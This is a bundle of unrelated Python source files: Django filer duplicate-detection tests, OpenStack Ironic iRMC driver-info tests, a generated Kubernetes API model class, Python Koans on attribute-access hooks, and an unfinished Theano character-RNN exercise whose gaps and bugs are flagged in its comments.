        self.assertEqual(File.objects.all().count(), 2)

    def test_duplicate_different_filename(self):
        """
        same filename, same folder => duplicate with default settings!
        :return:
        """
        self.create_two_files(duplicates=True, different_name=True)
        self.assertEqual(File.objects.all().count(), 1)
        # same again, dups!
        self.create_two_files(duplicates=True, different_name=True)
        self.assertEqual(File.objects.all().count(), 1)

    @override_settings(
        FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_DISABLED
    )
    def test_duplicate_detection_disabled(self):
        reload(signals_conf)
        self.create_two_files(duplicates=True, )
        self.assertEqual(File.objects.all().count(), 2)
        # same again, dups!
        self.create_two_files(duplicates=True, )
        self.assertEqual(File.objects.all().count(), 4)

    @override_settings(
        FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_ALL_FOLDERS_ALL_FILES
    )
    def test_duplicates_anywhere(self):
        reload(signals_conf)
        self.create_two_files(
            duplicates=True,
            different_name=True,
            different_folder=True,
        )
        self.assertEqual(File.objects.all().count(), 1)
        # same again, still dups!
        self.create_two_files(
            duplicates=True,
            folder=self.folder,
            different_name=True,
            different_folder=True,
        )
        self.assertEqual(File.objects.all().count(), 1)

    @override_settings(
        FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_DISABLED
    )
    def test_duplicates_greedy(self):
        """
        test greedy mode: already existing duplicates will also be merged
        :return:
        """
        reload(signals_conf)
        self.create_two_files(duplicates=True, different_name=True)
        self.assertEqual(File.objects.all().count(), 2)
        with self.settings(
            FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_ALL_FOLDERS_ALL_FILES_WITH_EXISTING  # noqa
        ):
            reload(signals_conf)
            self.create_two_files(duplicates=True, different_name=True)
            self.assertEqual(File.objects.all().count(), 1)

    @override_settings(
        FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_DISABLED
    )
    def test_duplicates_is_not_greedy(self):
        """
        test that normal mode is not greedy
        already existing duplicates will not be merged
        :return:
        """
        reload(signals_conf)
        self.create_two_files(duplicates=True, different_name=True)
        self.assertEqual(File.objects.all().count(), 2)
        with self.settings(
            FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_ALL_FOLDERS_ALL_FILES  # noqa
        ):
            reload(signals_conf)
            self.create_two_files(duplicates=True, different_name=True)
            self.assertEqual(File.objects.all().count(), 2)
|
|
# Copyright 2015 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Test class for common methods used by iRMC modules.
"""
import mock
from oslo_config import cfg
from ironic.common import exception
from ironic.conductor import task_manager
from ironic.drivers.modules.irmc import common as irmc_common
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.drivers import third_party_driver_mock_specs \
as mock_specs
from ironic.tests.unit.objects import utils as obj_utils
class IRMCValidateParametersTestCase(db_base.DbTestCase):
    """Tests for irmc_common.parse_driver_info() input validation."""

    def setUp(self):
        super(IRMCValidateParametersTestCase, self).setUp()
        # Node backed by the fake iRMC driver with a complete, valid
        # driver_info fixture; tests mutate/delete keys to hit each
        # validation path.
        self.node = obj_utils.create_test_node(
            self.context,
            driver='fake_irmc',
            driver_info=db_utils.get_test_irmc_info())

    def test_parse_driver_info(self):
        # Happy path: every key from the fixture is parsed through,
        # including the optional SNMP settings.
        info = irmc_common.parse_driver_info(self.node)
        self.assertEqual('1.2.3.4', info['irmc_address'])
        self.assertEqual('admin0', info['irmc_username'])
        self.assertEqual('fake0', info['irmc_password'])
        self.assertEqual(60, info['irmc_client_timeout'])
        self.assertEqual(80, info['irmc_port'])
        self.assertEqual('digest', info['irmc_auth_method'])
        self.assertEqual('ipmitool', info['irmc_sensor_method'])
        self.assertEqual('v2c', info['irmc_snmp_version'])
        self.assertEqual(161, info['irmc_snmp_port'])
        self.assertEqual('public', info['irmc_snmp_community'])
        self.assertFalse(info['irmc_snmp_security'])

    def test_parse_driver_option_default(self):
        # Only the required keys supplied: the optional ones must fall
        # back to the documented defaults.
        self.node.driver_info = {
            "irmc_address": "1.2.3.4",
            "irmc_username": "admin0",
            "irmc_password": "fake0",
        }
        info = irmc_common.parse_driver_info(self.node)
        self.assertEqual('basic', info['irmc_auth_method'])
        self.assertEqual(443, info['irmc_port'])
        self.assertEqual(60, info['irmc_client_timeout'])
        self.assertEqual('ipmitool', info['irmc_sensor_method'])

    def test_parse_driver_info_missing_address(self):
        # Each required key, when absent, raises MissingParameterValue.
        del self.node.driver_info['irmc_address']
        self.assertRaises(exception.MissingParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_missing_username(self):
        del self.node.driver_info['irmc_username']
        self.assertRaises(exception.MissingParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_missing_password(self):
        del self.node.driver_info['irmc_password']
        self.assertRaises(exception.MissingParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_invalid_timeout(self):
        # Non-numeric timeout is rejected.
        self.node.driver_info['irmc_client_timeout'] = 'qwe'
        self.assertRaises(exception.InvalidParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_invalid_port(self):
        # Non-numeric port is rejected.
        self.node.driver_info['irmc_port'] = 'qwe'
        self.assertRaises(exception.InvalidParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_invalid_auth_method(self):
        # Unknown auth method is rejected.
        self.node.driver_info['irmc_auth_method'] = 'qwe'
        self.assertRaises(exception.InvalidParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_invalid_sensor_method(self):
        # Unknown sensor method is rejected.
        self.node.driver_info['irmc_sensor_method'] = 'qwe'
        self.assertRaises(exception.InvalidParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_missing_multiple_params(self):
        # When several required keys are missing, all of them must be
        # reported in the single raised exception message.
        del self.node.driver_info['irmc_password']
        del self.node.driver_info['irmc_address']
        e = self.assertRaises(exception.MissingParameterValue,
                              irmc_common.parse_driver_info, self.node)
        self.assertIn('irmc_password', str(e))
        self.assertIn('irmc_address', str(e))

    def test_parse_driver_info_invalid_snmp_version(self):
        # SNMP version outside the supported set is rejected.
        self.node.driver_info['irmc_snmp_version'] = 'v3x'
        self.assertRaises(exception.InvalidParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_invalid_snmp_port(self):
        # The SNMP port must be an integer, not a numeric string.
        self.node.driver_info['irmc_snmp_port'] = '161'
        self.assertRaises(exception.InvalidParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_invalid_snmp_community(self):
        # v2c community must be a string.
        self.node.driver_info['irmc_snmp_version'] = 'v2c'
        self.node.driver_info['irmc_snmp_community'] = 100
        self.assertRaises(exception.InvalidParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_invalid_snmp_security(self):
        # v3 security name must be a string.
        self.node.driver_info['irmc_snmp_version'] = 'v3'
        self.node.driver_info['irmc_snmp_security'] = 100
        self.assertRaises(exception.InvalidParameterValue,
                          irmc_common.parse_driver_info, self.node)

    def test_parse_driver_info_empty_snmp_security(self):
        # v3 security name must be non-empty.
        self.node.driver_info['irmc_snmp_version'] = 'v3'
        self.node.driver_info['irmc_snmp_security'] = ''
        self.assertRaises(exception.InvalidParameterValue,
                          irmc_common.parse_driver_info, self.node)
class IRMCCommonMethodsTestCase(db_base.DbTestCase):
    """Tests for the irmc_common helpers (client/report factories, IPMI
    property sync, and config option bounds)."""

    def setUp(self):
        super(IRMCCommonMethodsTestCase, self).setUp()
        # Register the fake iRMC driver with the extension manager so a
        # node using it can be created and tasks acquired on it.
        mgr_utils.mock_the_extension_manager(driver="fake_irmc")
        self.info = db_utils.get_test_irmc_info()
        self.node = obj_utils.create_test_node(
            self.context,
            driver='fake_irmc',
            driver_info=self.info)

    @mock.patch.object(irmc_common, 'scci',
                       spec_set=mock_specs.SCCICLIENT_IRMC_SCCI_SPEC)
    def test_get_irmc_client(self, mock_scci):
        # get_irmc_client() must delegate to scci.get_client with the
        # parsed driver_info values and return its result unchanged.
        self.info['irmc_port'] = 80
        self.info['irmc_auth_method'] = 'digest'
        self.info['irmc_client_timeout'] = 60
        mock_scci.get_client.return_value = 'get_client'
        returned_mock_scci_get_client = irmc_common.get_irmc_client(self.node)
        mock_scci.get_client.assert_called_with(
            self.info['irmc_address'],
            self.info['irmc_username'],
            self.info['irmc_password'],
            port=self.info['irmc_port'],
            auth_method=self.info['irmc_auth_method'],
            client_timeout=self.info['irmc_client_timeout'])
        self.assertEqual('get_client', returned_mock_scci_get_client)

    def test_update_ipmi_properties(self):
        # update_ipmi_properties() must add the ipmi_* keys (derived from
        # the irmc_* credentials) on top of the existing driver_info.
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            ipmi_info = {
                "ipmi_address": "1.2.3.4",
                "ipmi_username": "admin0",
                "ipmi_password": "fake0",
            }
            task.node.driver_info = self.info
            irmc_common.update_ipmi_properties(task)
            actual_info = task.node.driver_info
            expected_info = dict(self.info, **ipmi_info)
            self.assertEqual(expected_info, actual_info)

    @mock.patch.object(irmc_common, 'scci',
                       spec_set=mock_specs.SCCICLIENT_IRMC_SCCI_SPEC)
    def test_get_irmc_report(self, mock_scci):
        # get_irmc_report() must delegate to scci.get_report with the
        # parsed driver_info values and return its result unchanged.
        self.info['irmc_port'] = 80
        self.info['irmc_auth_method'] = 'digest'
        self.info['irmc_client_timeout'] = 60
        mock_scci.get_report.return_value = 'get_report'
        returned_mock_scci_get_report = irmc_common.get_irmc_report(self.node)
        mock_scci.get_report.assert_called_with(
            self.info['irmc_address'],
            self.info['irmc_username'],
            self.info['irmc_password'],
            port=self.info['irmc_port'],
            auth_method=self.info['irmc_auth_method'],
            client_timeout=self.info['irmc_client_timeout'])
        self.assertEqual('get_report', returned_mock_scci_get_report)

    def test_out_range_port(self):
        # The [irmc] config options reject out-of-range / unknown values
        # when enforce_type is enabled.
        self.assertRaises(ValueError, cfg.CONF.set_override,
                          'port', 60, 'irmc', enforce_type=True)

    def test_out_range_auth_method(self):
        self.assertRaises(ValueError, cfg.CONF.set_override,
                          'auth_method', 'fake', 'irmc', enforce_type=True)

    def test_out_range_sensor_method(self):
        self.assertRaises(ValueError, cfg.CONF.set_override,
                          'sensor_method', 'fake', 'irmc', enforce_type=True)
|
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class AppsV1beta1DeploymentRollback(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """

    # swagger_types maps attribute name -> attribute type;
    # attribute_map maps attribute name -> JSON key in the API definition.
    swagger_types = {
        'api_version': 'str',
        'kind': 'str',
        'name': 'str',
        'rollback_to': 'AppsV1beta1RollbackConfig',
        'updated_annotations': 'dict(str, str)'
    }

    attribute_map = {
        'api_version': 'apiVersion',
        'kind': 'kind',
        'name': 'name',
        'rollback_to': 'rollbackTo',
        'updated_annotations': 'updatedAnnotations'
    }

    def __init__(self, api_version=None, kind=None, name=None, rollback_to=None, updated_annotations=None):
        """
        AppsV1beta1DeploymentRollback - a model defined in Swagger.

        ``name`` and ``rollback_to`` are required; passing None for either
        raises ValueError via their validating setters.
        """
        self._api_version = None
        self._kind = None
        self._name = None
        self._rollback_to = None
        self._updated_annotations = None
        self.discriminator = None

        # Optional fields are assigned only when explicitly provided so
        # that unset attributes remain None.
        if api_version is not None:
            self.api_version = api_version
        if kind is not None:
            self.kind = kind
        # Required fields always pass through their validating setters.
        self.name = name
        self.rollback_to = rollback_to
        if updated_annotations is not None:
            self.updated_annotations = updated_annotations

    @property
    def api_version(self):
        """
        Gets the api_version of this AppsV1beta1DeploymentRollback.

        APIVersion defines the versioned schema of this representation of an
        object. Servers should convert recognized schemas to the latest
        internal value, and may reject unrecognized values.

        :rtype: str
        """
        return self._api_version

    @api_version.setter
    def api_version(self, api_version):
        """
        Sets the api_version of this AppsV1beta1DeploymentRollback.

        :type: str
        """
        self._api_version = api_version

    @property
    def kind(self):
        """
        Gets the kind of this AppsV1beta1DeploymentRollback.

        Kind is a string value representing the REST resource this object
        represents. Cannot be updated. In CamelCase.

        :rtype: str
        """
        return self._kind

    @kind.setter
    def kind(self, kind):
        """
        Sets the kind of this AppsV1beta1DeploymentRollback.

        :type: str
        """
        self._kind = kind

    @property
    def name(self):
        """
        Gets the name of this AppsV1beta1DeploymentRollback.

        Required: This must match the Name of a deployment.

        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """
        Sets the name of this AppsV1beta1DeploymentRollback.

        Required field: rejects None.

        :type: str
        """
        if name is None:
            raise ValueError("Invalid value for `name`, must not be `None`")
        self._name = name

    @property
    def rollback_to(self):
        """
        Gets the rollback_to of this AppsV1beta1DeploymentRollback.

        The config of this deployment rollback.

        :rtype: AppsV1beta1RollbackConfig
        """
        return self._rollback_to

    @rollback_to.setter
    def rollback_to(self, rollback_to):
        """
        Sets the rollback_to of this AppsV1beta1DeploymentRollback.

        Required field: rejects None.

        :type: AppsV1beta1RollbackConfig
        """
        if rollback_to is None:
            raise ValueError("Invalid value for `rollback_to`, must not be `None`")
        self._rollback_to = rollback_to

    @property
    def updated_annotations(self):
        """
        Gets the updated_annotations of this AppsV1beta1DeploymentRollback.

        The annotations to be updated to a deployment.

        :rtype: dict(str, str)
        """
        return self._updated_annotations

    @updated_annotations.setter
    def updated_annotations(self, updated_annotations):
        """
        Sets the updated_annotations of this AppsV1beta1DeploymentRollback.

        :type: dict(str, str)
        """
        self._updated_annotations = updated_annotations

    def to_dict(self):
        """
        Returns the model properties as a dict.
        """
        def _plain(value):
            # Convert nested swagger models (anything exposing to_dict)
            # one level inside lists and dicts, mirroring the generated code.
            if isinstance(value, list):
                return [item.to_dict() if hasattr(item, "to_dict") else item
                        for item in value]
            if hasattr(value, "to_dict"):
                return value.to_dict()
            if isinstance(value, dict):
                return {key: (val.to_dict() if hasattr(val, "to_dict") else val)
                        for key, val in value.items()}
            return value

        return {attr: _plain(getattr(self, attr))
                for attr, _ in iteritems(self.swagger_types)}

    def to_str(self):
        """
        Returns the string representation of the model.
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`.
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal.
        """
        return (isinstance(other, AppsV1beta1DeploymentRollback)
                and self.__dict__ == other.__dict__)

    def __ne__(self, other):
        """
        Returns true if both objects are not equal.
        """
        return not self == other
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Partially based on AboutMessagePassing in the Ruby Koans
#
from runner.koan import *
class AboutAttributeAccess(Koan):
    """Koans exploring Python's attribute-access hooks:
    __getattribute__, __getattr__ and __setattr__."""

    class TypicalObject:
        pass

    def test_calling_undefined_functions_normally_results_in_errors(self):
        typical = self.TypicalObject()

        with self.assertRaises(AttributeError): typical.foobar()

    def test_calling_getattribute_causes_an_attribute_error(self):
        # Attribute lookup is routed through __getattribute__, so calling
        # it directly for a missing name raises the same AttributeError.
        typical = self.TypicalObject()

        with self.assertRaises(AttributeError): typical.__getattribute__('foobar')

    # THINK ABOUT IT:
    #
    # If the method __getattribute__() causes the AttributeError, then
    # what would happen if we redefine __getattribute__()?

    # ------------------------------------------------------------------

    class CatchAllAttributeReads:
        def __getattribute__(self, attr_name):
            # Intercepts EVERY attribute read, existing or not.
            return "Someone called '" + attr_name + "' and it could not be found"

    def test_all_attribute_reads_are_caught(self):
        catcher = self.CatchAllAttributeReads()

        self.assertRegexpMatches(catcher.foobar, "Someone called 'foobar' and it could not be found")

    def test_intercepting_return_values_can_disrupt_the_call_chain(self):
        catcher = self.CatchAllAttributeReads()

        self.assertRegexpMatches(catcher.foobaz, "Someone called 'foobaz' and it could not be found") # This is fine

        try:
            # catcher.foobaz evaluates to a string, so the trailing call
            # attempts to invoke a str.
            catcher.foobaz(1)
        except TypeError as ex:
            err_msg = ex.args[0]

        self.assertRegexpMatches(err_msg, "'str' object is not callable")

        # foobaz returns a string. What happens to the '(1)' part?
        # Try entering this into a python console to reproduce the issue:
        #
        #     "foobaz"(1)
        #

    def test_changes_to_the_getattribute_implementation_affects_getattr_function(self):
        # The builtin getattr() goes through __getattribute__ as well.
        catcher = self.CatchAllAttributeReads()

        self.assertRegexpMatches(getattr(catcher, 'any_attribute'), "Someone called 'any_attribute' and it could not be found")

    # ------------------------------------------------------------------

    class WellBehavedFooCatcher:
        def __getattribute__(self, attr_name):
            # Only intercept names starting with "foo"; everything else
            # is delegated to the normal lookup machinery.
            if attr_name[:3] == "foo":
                return "Foo to you too"
            else:
                return super().__getattribute__(attr_name)

    def test_foo_attributes_are_caught(self):
        catcher = self.WellBehavedFooCatcher()

        self.assertEqual("Foo to you too", catcher.foo_bar)
        self.assertEqual("Foo to you too", catcher.foo_baz)

    def test_non_foo_messages_are_treated_normally(self):
        catcher = self.WellBehavedFooCatcher()

        with self.assertRaises(AttributeError): catcher.normal_undefined_attribute

    # ------------------------------------------------------------------

    global stack_depth
    stack_depth = 0

    class RecursiveCatcher:
        def __init__(self):
            global stack_depth
            stack_depth = 0
            self.no_of_getattribute_calls = 0

        def __getattribute__(self, attr_name):
            global stack_depth  # We need something that is outside the scope of this class
            stack_depth += 1

            if stack_depth<=10: # to prevent a stack overflow
                self.no_of_getattribute_calls += 1
                # Oops! We just accessed an attribute (no_of_getattribute_calls)
                # Guess what happens when self.no_of_getattribute_calls is
                # accessed?

            # Using 'object' directly because using super() here will also
            # trigger a __getattribute__() call.
            return object.__getattribute__(self, attr_name)

        def my_method(self):
            pass

    def test_getattribute_is_a_bit_overzealous_sometimes(self):
        # Every read inside __getattribute__ recurses back into it; the
        # depth counter demonstrates how quickly that adds up.
        catcher = self.RecursiveCatcher()
        catcher.my_method()
        global stack_depth

        self.assertEqual(11, stack_depth)

    # ------------------------------------------------------------------

    class MinimalCatcher:
        class DuffObject: pass

        def __init__(self):
            self.no_of_getattr_calls = 0

        def __getattr__(self, attr_name):
            # __getattr__ (unlike __getattribute__) fires only when the
            # normal lookup fails.
            self.no_of_getattr_calls += 1
            return self.DuffObject

        def my_method(self):
            pass

    def test_getattr_ignores_known_attributes(self):
        catcher = self.MinimalCatcher()
        catcher.my_method()

        self.assertEqual(0, catcher.no_of_getattr_calls)

    def test_getattr_only_catches_unknown_attributes(self):
        catcher = self.MinimalCatcher()
        catcher.purple_flamingos()
        catcher.free_pie()

        self.assertEqual('DuffObject',
            type(catcher.give_me_duff_or_give_me_death()).__name__)

        self.assertEqual(3, catcher.no_of_getattr_calls)

    # ------------------------------------------------------------------

    class PossessiveSetter(object):
        def __setattr__(self, attr_name, value):
            # Rewrite selected attribute names before storing the value.
            new_attr_name = attr_name

            if attr_name[-5:] == 'comic':
                new_attr_name = "my_" + new_attr_name
            elif attr_name[-3:] == 'pie':
                new_attr_name = "a_" + new_attr_name

            object.__setattr__(self, new_attr_name, value)

    def test_setattr_intercepts_attribute_assignments(self):
        fanboy = self.PossessiveSetter()

        fanboy.comic = 'The Laminator, issue #1'
        fanboy.pie = 'blueberry'

        self.assertEqual('blueberry', fanboy.a_pie)

        prefix = 'my'
        self.assertEqual("The Laminator, issue #1", getattr(fanboy, prefix + '_comic'))

    # ------------------------------------------------------------------

    class ScarySetter:
        def __init__(self):
            # NOTE: these assignments already go through the overridden
            # __setattr__ below, so public names get the 'altered_' prefix.
            self.num_of_coconuts = 9
            self._num_of_private_coconuts = 2

        def __setattr__(self, attr_name, value):
            new_attr_name = attr_name

            if attr_name[0] != '_':
                new_attr_name = "altered_" + new_attr_name

            object.__setattr__(self, new_attr_name, value)

    def test_it_modifies_external_attribute_as_expected(self):
        setter = self.ScarySetter()
        setter.e = "mc hammer"

        self.assertEqual('mc hammer', setter.altered_e)

    def test_it_mangles_some_internal_attributes(self):
        setter = self.ScarySetter()

        try:
            coconuts = setter.num_of_coconuts
        except AttributeError:
            self.assertEqual(9, setter.altered_num_of_coconuts)

    def test_in_this_case_private_attributes_remain_unmangled(self):
        setter = self.ScarySetter()

        self.assertEqual(2, setter._num_of_private_coconuts)
|
|
# -*- coding: utf-8 -*-
# @Author: massimo
# @Date: 2016-03-10 22:49:31
# @Last Modified by: massimo
# @Last Modified time: 2016-03-10 23:29:56
import numpy as np
import theano
import theano.tensor as T
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
import utils
from updates import adagrad, apply_momentum
import time
from collections import OrderedDict
import os
import cPickle as pkl
class VanillaCharRNN:
    """
    Character-level vanilla (Elman) RNN implemented with Theano (Python 2).

    The network is trained on a raw text string and can then sample new
    text one character at a time. Several TODO sections are intentionally
    left unimplemented (this looks like an exercise scaffold); see the
    NOTE(review) comments below.
    """

    def __init__(
            self,
            rnn_layers=None,
            batch_size=32,
            grad_clip=5.0,
            learning_rate=0.01,
            momentum=0.5,
            dropout_p_hidden=0.0,
            numpy_rng=None,
            theano_rng=None
    ):
        # None sentinel avoids a shared mutable default for the layer sizes.
        if rnn_layers is None:
            rnn_layers = [100, 100]
        self.rnn_layers = rnn_layers
        self.batch_size = batch_size
        self.learning_rate = learning_rate
        self.dropout_p_hidden = dropout_p_hidden
        self.momentum = momentum
        self.grad_clip = grad_clip
        if numpy_rng is None:
            numpy_rng = np.random.RandomState(2**30)
        self.numpy_rng = numpy_rng
        if theano_rng is None:
            theano_rng = RandomStreams(2**30)
        self.theano_rng = theano_rng
        # Lazily built in fit() / init_from() / sample().
        self.vocab, self.params, self.train_fn, self.sample_fn = None, None, None, None

    def init(self):
        """Create and return the list of shared parameter variables."""
        # initialize the weights for the Vanilla RNN
        self.Wxh, self.Whh, self.bh = [], [], []  # input-to-hidden weights, hidden-to-hidden weights and biases
        # TODO: initialize the parameters of the RNN. Use the functions defined in the utils package
        # NOTE(review): 'i' is undefined here -- the TODO above is expected
        # to introduce the per-layer loop that defines it; as written this
        # raises NameError. Confirm before use.
        self.Why = utils.init_weights((self.rnn_layers[i], self.vocab_size), rng=self.numpy_rng, name='Why') # hidden to output weights
        self.by = theano.shared(value=np.zeros((self.vocab_size,), dtype=theano.config.floatX), borrow=True, name='by') # hidden to output bias
        params = self.Wxh + self.Whh + self.bh + [self.Why, self.by]
        return params

    def model(self, X, dropout_p_hidden):
        """
        Build the training graph from the int matrix X of character
        indices; returns (y_hat, cost).
        """
        def _step_index(x_t, ht_1, Wxh, Whh, bh):
            # x_t: array of type int32
            # use indexing on Wxh matrix instead of the dot product of the one-hot vectors for computational and memory efficiency
            return T.tanh(Wxh[x_t] + T.dot(ht_1, Whh) + bh) # compute the next hidden state

        def _step(x_t, ht_1, Wxh, Whh, bh):
            return T.tanh(T.dot(x_t, Wxh) + T.dot(ht_1, Whh) + bh) # compute the next hidden state

        x = X[:-1]
        y = X[1:] # y is x shifted back by one character
        # TODO: write the code to update the hidden states of the rnn here
        # use theano.scan() to call the _step_index and _step functions iteratively over x
        # NOTE(review): 'h = x' is a placeholder until the scan above is
        # implemented; the shapes below assume the real hidden states.
        h = x
        # h has shape (n_steps, batch_size, rnn_layers[-1])
        y_logit = T.dot(h, self.Why) + self.by
        # y_logit has shape (n_steps, batch_size, vocab_size)
        # to compute the softmax properly, we need a 2 dimensional array with vocab_size as second dimension
        y_logit = y_logit.reshape([y_logit.shape[0] * y_logit.shape[1], y_logit.shape[2]])
        y_hat = self.softmax(y_logit)
        cost = self.cross_entropy(y, y_hat)
        return y_hat, cost

    def model_sample(self, X, H, sampling_temp):
        """
        Build the one-step sampling graph: advance the per-layer hidden
        states H by one character X and return (y_hat, H_new).
        """
        def _step_index(x_t, ht_1, Wxh, Whh, bh):
            # x_t: array of type int32
            # use indexing on Wxh matrix instead of the dot product of the one-hot vectors for computational and memory efficiency
            return T.tanh(Wxh[x_t] + T.dot(ht_1, Whh) + bh) # compute the next hidden state

        def _step(x_t, ht_1, Wxh, Whh, bh):
            return T.tanh(T.dot(x_t, Wxh) + T.dot(ht_1, Whh) + bh) # compute the next hidden state

        H_new = []
        # TODO: write the code for update the hidden state of the RNN after one step only
        # Hint: no theano.scan() is required here
        # NOTE(review): H_new is empty until the TODO is implemented, so
        # H_new[-1] below raises IndexError as written.
        h = H_new[-1]
        y_logit = T.dot(h, self.Why) + self.by
        y_logit = y_logit.reshape([y_logit.shape[0] * y_logit.shape[1], y_logit.shape[2]])
        y_hat = self.softmax(y_logit, sampling_temp)
        return y_hat, H_new

    def cross_entropy(self, y, y_hat):
        """Average negative log-likelihood of targets y under y_hat."""
        # y_hat has shape (n_steps * batch_size, vocab_size)
        # y has shape (n_steps, batch_size)
        y_flatten = y.flatten()
        y_hat_flatten = y_hat.flatten()
        # Index the flat probability array at the target character of
        # every (step, batch) position.
        offsets = T.cast(T.arange(y_flatten.shape[0]) * self.vocab_size + y_flatten, 'int32')
        cost = -T.log(y_hat_flatten[offsets])
        cost = cost.reshape([y.shape[0], y.shape[1]])
        cost = T.mean(cost, axis=0) # compute the average cost per input sequence
        return T.mean(cost) # then the average batch cost

    def softmax(self, x, temp=1.0):
        """Temperature-controlled, numerically stable softmax over axis 1."""
        # divide x by the softmax temperature to control sampling
        x /= temp
        # numerically stable version of softmax (it avoids exp to blowup due to high values of x)
        exp_x = T.exp(x - T.max(x, axis=1, keepdims=True))
        return exp_x / T.sum(exp_x, axis=1, keepdims=True)

    # DROPOUT #
    def dropout(self, x, p=0):
        """Apply inverted dropout to x with drop probability p."""
        if p > 0:
            # NOTE(review): retain_p is derived from the tensor x; for
            # inverted dropout this should presumably be 1.0 - p — confirm.
            retain_p = 1.0 - x
            x *= self.theano_rng.binomial(x.shape, p=retain_p, dtype=theano.config.floatX)
            x /= retain_p
        return x

    def get_params(self):
        """Return the list of shared parameter variables."""
        return self.params

    def export_params(self):
        """Return the parameter values as plain numpy arrays."""
        return [p.get_value() for p in self.params]

    def import_params(self, iparams):
        """Load numpy parameter values into the shared variables,
        checking count and shapes first."""
        assert len(self.params) == len(iparams), 'Different number of params ({} != {})'.format(len(self.params), len(iparams))
        for psrc, pdest in zip(iparams, self.params):
            pdest_shape = pdest.get_value(borrow=True).shape
            assert psrc.shape == pdest_shape, 'Source and destination param shapes do not correspond ({} != {})'.format(psrc.shape, pdest_shape)
            pdest.set_value(psrc, borrow=True)

    def floatX(self, arr):
        """Cast an array to Theano's configured float dtype."""
        return np.asarray(arr, dtype=theano.config.floatX)

    def _split_sequences(self, x_ix, seq_length=25, padding_char=' '):
        """Pad the index vector and reshape it into rows of seq_length."""
        # pad the entire text with spaces to make the total length multiple of sequence length
        x_padding = np.asarray([self.ch_to_ix[padding_char]] * (seq_length - x_ix.shape[0] % seq_length), dtype=np.int32)
        x_ix = np.concatenate((x_ix, x_padding))
        # split x into blocks of length equal to seq_length
        n_seqs = int(x_ix.shape[0] / seq_length)
        x_ix = x_ix.reshape((n_seqs, seq_length))
        return x_ix

    def fit(self, x, valid=None, epochs=10, seq_length=25, sampling_temp=0.7, sample_freq=10, checkpoint_freq=10, checkpoints_dir='models', unk_char='*'):
        """
        Train the network on the text string x.

        When a validation string is given, validation loss is tracked and
        checkpoints are pickled every checkpoint_freq epochs.
        """
        # NOTE: checkpoints are generated only when a validation set is provided
        # build the character vocabulary
        vocab = set(x)
        if self.vocab is None or vocab != self.vocab:
            self.vocab = vocab
            self.vocab.add(unk_char)    # special placeholder for out-of-vocabulary characters
            self.vocab_size = len(vocab)
            self.ch_to_ix = {ch: i for i, ch in enumerate(vocab)}
            self.ix_to_ch = {v: k for k, v in self.ch_to_ix.iteritems()}
        print 'Vocab size:', self.vocab_size
        # NOTE: checkpoints will be generated only if a validation set is provided
        if self.train_fn is None:
            print 'Compiling the training functions'
            X = T.imatrix()
            self.params = self.init()
            y_hat, cost = self.model(X, self.dropout_p_hidden)
            pgrads = T.grad(cost, wrt=self.params)
            # gradient clipping to avoid exploding gradients
            if self.grad_clip > 0.:
                gnorm = T.sum([T.sum(g ** 2) for g in pgrads])
                # to clip gradients we use the following heuristic
                # new_g = g * grad_clip / total_grad_norm
                pgrads = [T.switch(gnorm > self.grad_clip, g * self.grad_clip / gnorm, g) for g in pgrads]
            updates = adagrad(cost, self.params, grads=pgrads, learning_rate=self.learning_rate)
            if self.momentum > 0.:
                updates = apply_momentum(updates, self.momentum)
            self.train_fn = theano.function(inputs=[X], outputs=cost, updates=updates)
            self.cost_fn = theano.function(inputs=[X], outputs=cost)
        # convert strings to integer vectors
        x_ix = np.asarray([self.ch_to_ix[ch] for ch in x], dtype=np.int32)
        if valid is not None:
            # out-of-vocabulary characters in the validation set map to unk_char
            valid_ix = np.asarray([self.ch_to_ix.get(ch, self.ch_to_ix[unk_char]) for ch in valid], dtype=np.int32)
            if not os.path.exists(checkpoints_dir):
                os.makedirs(checkpoints_dir)
        # Let's check the initial cost matches the expected one
        # print 'Expected initial cost:', np.log(len(vocab))
        # print 'Actual initial cost:', self.cost_fn(x_ix[:,None])
        # split the training sequence into equal blocks of length seq_length
        x_ix = self._split_sequences(x_ix, seq_length, padding_char=' ')
        # randomly shuffle the training sequences
        x_ix = x_ix[self.numpy_rng.permutation(x_ix.shape[0])]
        # then start training
        # ceil division: the last partial batch is still used
